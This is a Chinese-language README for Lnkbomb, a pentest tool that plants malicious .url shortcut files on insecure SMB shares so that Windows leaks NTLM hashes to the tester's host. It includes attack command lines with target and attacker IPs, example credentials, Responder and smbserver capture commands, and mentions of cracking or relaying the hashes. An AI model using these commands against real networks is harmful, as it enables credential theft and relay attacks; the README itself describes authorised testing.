Lnkbomb 用于向不安全的文件共享上传恶意快捷方式文件。该漏洞存在的原因在于 Windows 会查找与快捷方式文件关联的图标文件。该图标文件可以被指向渗透测试人员运行 Responder 或 smbserver 的机器,从而收集 NTLMv1 或 NTLMv2 哈希(具体取决于受害主机的配置)。测试人员随后可以尝试使用 Hashcat 等工具离线破解收集到的哈希,或将其中继到 ntlmrelayx 等工具进行进一步利用。
载荷文件直接上传到测试人员在命令行中指定的不安全文件共享。测试人员还需提供其 IP 地址,该地址会被写入载荷中。
2.0 版本对该工具进行了全面重构,并使用了 pysmb 库,支持未经身份验证和经过身份验证的载荷投放。
安装 Lnkbomb
请注意,该项目在 Windows 下运行稳定。在 Linux 下可能存在问题。
git clone https://github.com/dievus/lnkbomb.git
切换到 lnkbomb 目录并运行:
python3 lnkbomb.py -h
这将输出帮助菜单,其中包含以下标志:
-h, --help - 列出帮助选项
-t, --target - 指定目标 IP 地址
-a, --attacker - 指定测试人员攻击机的 IP 地址
-r, --recover - 用于在测试完成后移除载荷(例如 -r payloadname.url)
-w, --windows - 新命令 - 用于设置 Windows 共享的适当端口
-l, --linux - 新命令 - 用于设置 Linux 共享的适当端口
-n, --netbios - 新命令 - 必须包含目标 Windows 机器的 NetBIOS 名称
完整命令示例包括:
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
你需要使用 Responder 或 smbserver 等工具来捕获 NTLM 哈希。
responder -I eth0 -dwFP -v
或
smbserver.py . . -smb2support
请记住,本工具仅用于道德黑客和渗透测试目的。我不赞同任何对未经授权目标进行测试的行为。
本工具是否有效取决于目标系统的补丁和版本。用户体验可能有所不同。
我知道它是 .url 快捷方式而非 .lnk 扩展名。我故意这么写来刺激你。